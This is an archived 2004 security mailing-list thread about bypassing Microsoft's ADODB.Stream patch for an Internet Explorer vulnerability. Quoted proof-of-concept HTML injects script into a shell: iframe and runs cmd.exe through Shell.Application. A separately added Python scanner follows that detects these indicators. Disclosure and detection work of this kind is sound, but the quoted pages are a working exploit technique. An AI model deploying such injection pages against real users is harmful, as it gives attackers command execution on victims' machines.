Message-ID: <200407031524.i63FOtLs029773@web170.megawebservers.com>
Date: Sat, 3 Jul 2004 15:24:55 -0000
From: <liudieyu@...rella.name>
To: "Jelmer" <jkuperus@...net.nl>, <liudieyu@...rella.name>,
   <bugtraq@...urityfocus.com>, <NTBugtraq@...tserv.ntbugtraq.com>,
   <full-disclosure@...ts.netsys.com>
Subject: RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH




at the very beginning, using shell.application is not "another" way - it's
actually the only solution available for the general public. most of the
profitable systems to crack today have norton.antivirus.enterprise.xxxx
installed - which means MS-ITS & Adodb.Stream are disabled. i must admit,
norton.antivirus did stop the insider exploit - this time.

so, a real malicious attacker with normal intel would never simply copy the
public exploit (which involves MS-ITS and ADODB.STREAM) and send it to his
targets - he'll use shell.application instead of adodb.stream.

the weirdest thing is the following fact:
norton is securing windows faster than microsoft.
(the latter is OS PRODUCER, while the former is ANTIVIRUS)

Jelmer <jkuperus@...net.nl> said:

> Well, it's not quite as easy as you make it sound.
> I think you only took a look at http-equiv's example I posted to full
> disclosure and based your post on that. You see this:
> 
> 
> --snip--
> 
> <iframe src="c:\windows\web\tip.htm"
> style="width:400px;height:200px;"></iframe>
> 
> <textarea id="code" style="display:none;">
>   injected.
>   <script language="JScript" DEFER>
>     alert('attempting injection');
>     var obj=new ActiveXObject("Shell.Application");
>     obj.ShellExecute("cmd.exe","/c pause");
>   </script>
> </textarea>
> 
> <script language="javascript">
>     
>     function doit() {
>       document.frames[0].document.body.insertAdjacentHTML('afterBegin',
> document.all.code.value);
>     }
>     setTimeout("doit()", 2000);
> </script>
> 
> --snip--
> 
> Doesn't work; it gives an access denied exception.
> But this..
> 
> 
> --snip--
> 
> <iframe src="shell:windows\web\tip.htm"
> style="width:400px;height:200px;"></iframe>
> 
> 
> <textarea id="code" style="display:none;">
>   injected.
>   <script language="JScript" DEFER>
>     alert('attempting injection');
>     var obj=new ActiveXObject("Shell.Application");
>     obj.ShellExecute("cmd.exe","/c pause");
>   </script>
> </textarea>
> 
> 
> <script language="javascript">
>     
>     function doit() {
>       document.frames[0].document.body.insertAdjacentHTML('afterBegin',
> document.all.code.value);
>     }
>     setTimeout("doit()", 2000);
> </script>
> 
> --snip--
> 
> 
> ..does, notice the subtle difference.
> The iframe in the 2nd example is set to shell:windows\web\tip.htm
> instead of the hard-coded c:\windows\web\tip.htm
> and it works. It was http-equiv who probably, by a mixture of luck and gut
> instinct through experience, found this out when we were doing some mailing
> back and forth to tackle some unrelated problem.
> If you'd actually tried to exploit it you would have known this.
> 
> 
> 
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
> liudieyu@...rella.name
> Sent: zaterdag 3 juli 2004 3:28
> To: bugtraq@...urityfocus.com; NTBugtraq@...tserv.ntbugtraq.com;
> full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] THE INSIDER VULNERABILITY STILL WORKS AFTER
> TODAY'S PATCH
> 
> 
> 
> FROM: Liu Die Yu - http://umbrella.name/
> TO  : bugtraq@...urityfocus.com, NTBugtraq@...tserv.ntbugtraq.com,
> full-disclosure@...ts.netsys.com
> SUBJ: THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
> DATE: 2004/07/03 UTC+800
> BODY:
> 
> [background]
> the latest 0day remote compromise exploit for internet explorer was found
> being used in the wild. :-)
> 
> "the-insider" exploit was first noticed by the-insider:
> http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclosure_message-2004060050
> and then documented by jelmer:
> http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclosure_message-2004060124
> http://62.131.86.111/analysis.htm
> 
> microsoft just released:
> Critical Update for Microsoft Data Access Components - Disable ADODB.Stream
> object from Internet Explorer (KB870669)
> http://www.microsoft.com/downloads/details.aspx?FamilyID=4D056748-C538-46F6-B7C8-2FBFD0D237E3&DisplayLang=en
> which kills the old exploit.
> 
> [FIX FOR THE PATCH]
> use Shell.Application instead.
> 
> [service]
> both "attack service"(finding bugs) and "defense service"(securing systems):
> http://umbrella.name/
> 
> [greetings]
> malware( http://www.malware.com/ ) who found Shell.Application.
> 
> [signature]
> LIUDIEYU
> liudieyu AT umbrella . name
> 
> 
> 
> 



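As an added illustration (my own code, not part of this thread or of any poster's files), a defender-side content scanner in Python that flags the indicators the thread makes visible: Shell.Application instantiation and ShellExecute, the shell: frame source that Jelmer reports succeeds where a plain c:\ path is denied, the cross-frame insertAdjacentHTML write, and the ADODB.Stream and MS-ITS components that KB870669 and Norton already block. The rule names, the block/quarantine/flag mapping and the sample pages are my own assumptions.

```python
import re

# Signatures for the injection technique discussed in the thread, keyed by
# name so a mail gateway or proxy can log which indicator fired.
RULES = {
    # Shell.Application instantiation and its ShellExecute method
    "shell-application": re.compile(
        r'ActiveXObject\s*\(\s*["\']Shell\.Application["\']\s*\)', re.I),
    "shellexecute": re.compile(r'\.ShellExecute\s*\(', re.I),
    # frame src using the shell: scheme (the variant Jelmer reports working)
    "shell-scheme-frame": re.compile(
        r'<i?frame\b[^>]*\bsrc\s*=\s*["\']?shell:', re.I),
    # frame src naming a local drive path (the variant reported as denied)
    "local-path-frame": re.compile(
        r'<i?frame\b[^>]*\bsrc\s*=\s*["\']?(?:file:|[a-z]:\\)', re.I),
    # components that KB870669 and Norton already neutralise
    "adodb-stream": re.compile(r'\bADODB\.Stream\b', re.I),
    "ms-its-scheme": re.compile(r'\bms-its:', re.I),
    # script writing markup into a child frame's document
    "cross-frame-injection": re.compile(
        r'frames\s*\[\s*\d+\s*\][^;]*\.document\b[^;]*insertAdjacentHTML', re.I),
}

def scan_html(html: str) -> list[str]:
    """Return the names of every rule that matches the HTML body."""
    return [name for name, rx in RULES.items() if rx.search(html)]

def classify(hits: list[str]) -> str:
    """Map hits to a gateway action: direct use of the abused COM objects is
    blocked; the shell: frame or cross-frame write alone is quarantined."""
    if {"shell-application", "shellexecute", "adodb-stream", "ms-its-scheme"} & set(hits):
        return "block"
    if "shell-scheme-frame" in hits or "cross-frame-injection" in hits:
        return "quarantine"
    return "flag" if hits else "allow"

# Constructed samples (not the thread's files): the payload from the thread
# behind a shell: frame, behind a c:\ frame, and a benign page for contrast.
PAYLOAD = (
    '<textarea id="code" style="display:none;"><script language="JScript" DEFER>'
    'var obj=new ActiveXObject("Shell.Application");'
    'obj.ShellExecute("cmd.exe","/c pause");</script></textarea>\n'
    "<script>function doit(){document.frames[0].document.body"
    ".insertAdjacentHTML('afterBegin',document.all.code.value);}"
    'setTimeout("doit()",2000);</script>\n'
)
SAMPLE_SHELL = '<iframe src="shell:windows\\web\\tip.htm"></iframe>\n' + PAYLOAD
SAMPLE_CDRIVE = '<iframe src="c:\\windows\\web\\tip.htm"></iframe>\n' + PAYLOAD
SAMPLE_BENIGN = ('<iframe src="https://example.com/tip.htm"></iframe>\n'
                 '<script>document.getElementById("x").innerText="hi";</script>\n')
```

Run scan_html on a message body and feed the result to classify; the c:\ variant is still blocked even though Jelmer reports it fails at runtime, because the Shell.Application call itself is the indicator worth acting on.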